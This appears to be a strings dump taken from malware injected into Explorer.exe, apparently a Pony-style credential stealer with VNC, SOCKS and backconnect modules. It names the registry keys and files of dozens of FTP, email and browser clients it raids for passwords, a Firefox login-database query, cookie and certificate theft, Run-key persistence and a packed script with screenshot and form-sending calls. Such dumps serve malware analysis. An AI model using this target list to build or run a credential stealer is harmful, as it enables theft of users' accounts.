\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
%System%\wbem\wmiprvse.exe
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

Explorer.EXE_880_rwx_01E50000_0004E000:

%Documents and Settings%\All Users\Application Data\wzbrwgd.dat
.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

Explorer.EXE_880_rwx_01EE0000_00078000:

.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
